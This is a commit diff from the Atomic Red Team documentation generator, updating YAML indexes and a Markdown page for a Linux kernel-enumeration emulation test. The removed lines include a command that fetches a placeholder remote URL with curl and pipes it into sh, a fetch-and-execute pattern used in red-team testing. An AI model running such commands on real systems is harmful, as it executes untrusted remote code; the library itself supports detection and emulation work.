Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2023-11-09 04:00:38 +00:00
parent 8fa4b4cbeb
commit 2a6bbc2a2b
3 changed files with 7 additions and 20 deletions
+3 -5
View File
@@ -56605,11 +56605,9 @@ execution:
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|sh\nls -la /tmp/art.txt \n"
cleanup_command: |
rm /tmp/art.txt
uname -srm
command: 'uname -srm
'
T1559:
technique:
x_mitre_platforms:
+3 -5
View File
@@ -36323,11 +36323,9 @@ execution:
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|sh\nls -la /tmp/art.txt \n"
cleanup_command: |
rm /tmp/art.txt
uname -srm
command: 'uname -srm
'
T1559:
technique:
x_mitre_platforms:
+1 -10
View File
@@ -690,16 +690,6 @@ An adversary may want to enumerate the kernel information to tailor their attack
```sh
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |sh
ls -la /tmp/art.txt
```
#### Cleanup Commands:
```sh
rm /tmp/art.txt
uname -srm
```
@@ -707,4 +697,5 @@ uname -srm
<br/>